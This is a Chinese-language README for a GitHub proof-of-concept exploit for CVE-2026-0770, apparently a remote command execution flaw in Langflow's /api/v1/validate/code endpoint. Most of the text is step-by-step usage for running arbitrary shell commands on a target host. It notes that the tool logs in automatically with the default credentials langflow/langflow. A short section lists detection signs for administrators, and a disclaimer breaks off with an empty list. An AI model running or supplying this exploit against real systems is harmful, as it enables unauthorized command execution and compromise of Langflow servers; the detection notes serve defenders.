git clone https://github.com/0xgh057r3c0n/CVE-2026-0770.git
cd CVE-2026-0770
确保已安装 Python 3.8+。
安装依赖:
pip install requests colorama
python3 -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
pip install requests colorama
启动交互式远程命令执行:
python3 CVE-2026-0770.py -t http://target:7860
示例:
python3 CVE-2026-0770.py -t http://192.168.1.100:7860
python3 CVE-2026-0770.py -t http://target:7860 -c "id"
示例:
python3 CVE-2026-0770.py -t http://localhost:7860 -c "whoami"
python3 CVE-2026-0770.py -t http://target:7860 -c "ls -la" -v
显示详细的调试输出。
python3 CVE-2026-0770.py -t http://target:7860 -k "your.jwt.token"
如果未提供 token,脚本将尝试使用以下默认凭据进行自动登录:
username: langflow
password: langflow
如果成功,将获取 access_token 并继续执行。
管理员应:
AUTO_LOGIN/api/v1/validate/code 的访问监控以下内容:
对 /api/v1/validate/code 的可疑 POST 请求
包含以下内容的代码:
__import__subprocessthrow(Exception(使用默认凭据的重复登录尝试
.
├── CVE-2026-0770.py
├── LICENSE
└── README.md
0xgh057r3c0n 🔗 https://github.com/0xgh057r3c0n
安全研究员 | 漏洞利用开发者 | PoC 编写者
基于 MIT 许可证分发。 在此查看完整许可证:
本项目仅用于:
未经授权对您不拥有或未获得明确测试许可的系统进行使用是违法的。